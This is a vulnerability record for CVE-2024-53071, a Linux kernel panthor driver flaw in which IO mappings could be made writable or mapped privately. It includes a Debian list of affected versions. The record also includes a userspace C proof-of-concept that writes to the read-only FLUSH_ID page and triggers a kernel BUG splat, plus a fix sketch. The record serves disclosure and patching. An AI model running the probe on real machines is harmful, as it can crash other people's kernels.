CVE-2024-53071

Source
https://nvd.nist.gov/vuln/detail/CVE-2024-53071
Import Source
https://storage.googleapis.com/osv-test-cve-osv-conversion/osv-output/CVE-2024-53071.json
JSON Data
https://api.test.osv.dev/v1/vulns/CVE-2024-53071
Related
Published
2024-11-19T18:15:26Z
Modified
2024-11-23T23:48:25.790831Z
Summary
[none]
Details

In the Linux kernel, the following vulnerability has been resolved:

drm/panthor: Be stricter about IO mapping flags

The current panthor_device_mmap_io() implementation has two issues:

  1. For mapping DRM_PANTHOR_USER_FLUSH_ID_MMIO_OFFSET, panthor_device_mmap_io() bails if VM_WRITE is set, but does not clear VM_MAYWRITE. That means userspace can use mprotect() to make the mapping writable later on. This is a classic Linux driver gotcha. I don't think this actually has any impact in practice: When the GPU is powered, writes to the FLUSH_ID seem to be ignored; and when the GPU is not powered, the dummy_latest_flush page provided by the driver is deliberately designed to not do any flushes, so the only thing writing to the dummy_latest_flush could achieve would be to make more flushes happen.

  2. panthor_device_mmap_io() does not block MAP_PRIVATE mappings (which are mappings without the VM_SHARED flag). MAP_PRIVATE in combination with VM_MAYWRITE indicates that the VMA has copy-on-write semantics, which for VM_PFNMAP are semi-supported but fairly cursed. In particular, in such a mapping, the driver can only install PTEs during mmap() by calling remap_pfn_range() (because remap_pfn_range() wants to store the physical address of the mapped physical memory into the vm_pgoff of the VMA); installing PTEs later on with a fault handler (as panthor does) is not supported in private mappings, and so if you try to fault in such a mapping, vmf_insert_pfn_prot() splats when it hits a BUG() check. (Both scenarios are exercised by the probe sketched after this list.)
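
As a hedged illustration (not the reproducer from the author's mailing-list notes), a userspace probe for both scenarios could look like the sketch below. The device path is an assumption (any node served by panthor would do), it needs the kernel UAPI header drm/panthor_drm.h, and on 32-bit targets it should be compiled with -D_FILE_OFFSET_BITS=64 so the large mmap offset fits:

/*
 * Hedged sketch, not the mailing-list reproducer: probe both scenarios.
 * /dev/dri/renderD128 is assumed to be a panthor device.
 */
#include <drm/panthor_drm.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

int main(void)
{
        long psz = sysconf(_SC_PAGESIZE);
        int fd = open("/dev/dri/renderD128", O_RDWR); /* assumed panthor node */

        if (fd < 0) {
                perror("open");
                return 1;
        }

        /* Scenario 1: the driver rejects VM_WRITE at mmap() time, so map the
         * FLUSH_ID page read-only, then upgrade with mprotect(). On unfixed
         * kernels VM_MAYWRITE is still set, so the upgrade succeeds and the
         * write goes through. */
        volatile unsigned char *shared =
                mmap(NULL, psz, PROT_READ, MAP_SHARED, fd,
                     DRM_PANTHOR_USER_FLUSH_ID_MMIO_OFFSET);
        if (shared != MAP_FAILED &&
            mprotect((void *)shared, psz, PROT_READ | PROT_WRITE) == 0) {
                printf("scenario 1: mprotect() upgrade succeeded (unfixed kernel)\n");
                shared[0] = 1; /* write to the supposedly read-only mapping */
        }

        /* Scenario 2: a MAP_PRIVATE mapping has VM_MAYWRITE without
         * VM_SHARED, i.e. copy-on-write semantics. mmap() itself succeeds on
         * unfixed kernels; the first fault then hits the BUG() check in
         * vmf_insert_pfn_prot() and splats. */
        volatile unsigned char *priv =
                mmap(NULL, psz, PROT_READ, MAP_PRIVATE, fd,
                     DRM_PANTHOR_USER_FLUSH_ID_MMIO_OFFSET);
        if (priv != MAP_FAILED)
                (void)priv[0]; /* faulting the private mapping triggers the splat */

        return 0;
}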

Fix it by clearing the VM_MAYWRITE flag (userspace writing to the FLUSH_ID doesn't make sense) and requiring VM_SHARED (copy-on-write semantics for the FLUSH_ID don't make sense).
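
A minimal sketch of the shape of that fix, in the FLUSH_ID case of panthor_device_mmap_io() (abbreviated to the relevant case, and not necessarily the verbatim upstream diff):

/* Sketch of the hardened FLUSH_ID case; not the verbatim upstream patch. */
switch (offset) {
case DRM_PANTHOR_USER_FLUSH_ID_MMIO_OFFSET:
        if (vma->vm_end - vma->vm_start != PAGE_SIZE ||
            (vma->vm_flags & (VM_WRITE | VM_EXEC)) ||
            !(vma->vm_flags & VM_SHARED)) /* reject MAP_PRIVATE mappings */
                return -EINVAL;
        /* Also drop VM_MAYWRITE so a later mprotect(PROT_WRITE) fails. */
        vm_flags_clear(vma, VM_MAYWRITE);
        break;

default:
        return -EINVAL;
}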

Reproducers for both scenarios are in the notes of my patch on the mailing list; I tested that these bugs exist on a Rock 5B machine.

Note that I have only compile-tested the patch; I haven't tested it at runtime, since I don't have a working kernel build setup for the test machine yet. Please test it before applying it.

References

Affected packages

Debian:13 / linux

Package

Name
linux
Purl
pkg:deb/debian/linux?arch=source

Affected ranges

Type
ECOSYSTEM
Events
Introduced
0 (unknown introduced version / all previous versions are affected)
Fixed
6.11.9-1

Affected versions

6.*

6.1.27-1
6.1.37-1
6.1.38-1
6.1.38-2~bpo11+1
6.1.38-2
6.1.38-3
6.1.38-4~bpo11+1
6.1.38-4
6.1.52-1
6.1.55-1~bpo11+1
6.1.55-1
6.1.64-1
6.1.66-1
6.1.67-1
6.1.69-1~bpo11+1
6.1.69-1
6.1.76-1~bpo11+1
6.1.76-1
6.1.82-1
6.1.85-1
6.1.90-1~bpo11+1
6.1.90-1
6.1.94-1~bpo11+1
6.1.94-1
6.1.98-1
6.1.99-1
6.1.106-1
6.1.106-2
6.1.106-3
6.1.112-1
6.1.115-1
6.3.1-1~exp1
6.3.2-1~exp1
6.3.4-1~exp1
6.3.5-1~exp1
6.3.7-1~bpo12+1
6.3.7-1
6.3.11-1
6.4~rc6-1~exp1
6.4~rc7-1~exp1
6.4.1-1~exp1
6.4.4-1~bpo12+1
6.4.4-1
6.4.4-2
6.4.4-3~bpo12+1
6.4.4-3
6.4.11-1
6.4.13-1
6.5~rc4-1~exp1
6.5~rc6-1~exp1
6.5~rc7-1~exp1
6.5.1-1~exp1
6.5.3-1~bpo12+1
6.5.3-1
6.5.6-1
6.5.8-1
6.5.10-1~bpo12+1
6.5.10-1
6.5.13-1
6.6.3-1~exp1
6.6.4-1~exp1
6.6.7-1~exp1
6.6.8-1
6.6.9-1
6.6.11-1
6.6.13-1~bpo12+1
6.6.13-1
6.6.15-1
6.6.15-2
6.7-1~exp1
6.7.1-1~exp1
6.7.4-1~exp1
6.7.7-1
6.7.9-1
6.7.9-2
6.7.12-1~bpo12+1
6.7.12-1
6.8.9-1
6.8.11-1
6.8.12-1~bpo12+1
6.8.12-1
6.9.2-1~exp1
6.9.7-1~bpo12+1
6.9.7-1
6.9.8-1
6.9.9-1
6.9.10-1~bpo12+1
6.9.10-1
6.9.11-1
6.9.12-1
6.10-1~exp1
6.10.1-1~exp1
6.10.3-1
6.10.4-1
6.10.6-1~bpo12+1
6.10.6-1
6.10.7-1
6.10.9-1
6.10.11-1~bpo12+1
6.10.11-1
6.10.12-1
6.11~rc4-1~exp1
6.11~rc5-1~exp1
6.11-1~exp1
6.11.2-1
6.11.4-1
6.11.5-1~bpo12+1
6.11.5-1
6.11.6-1
6.11.7-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}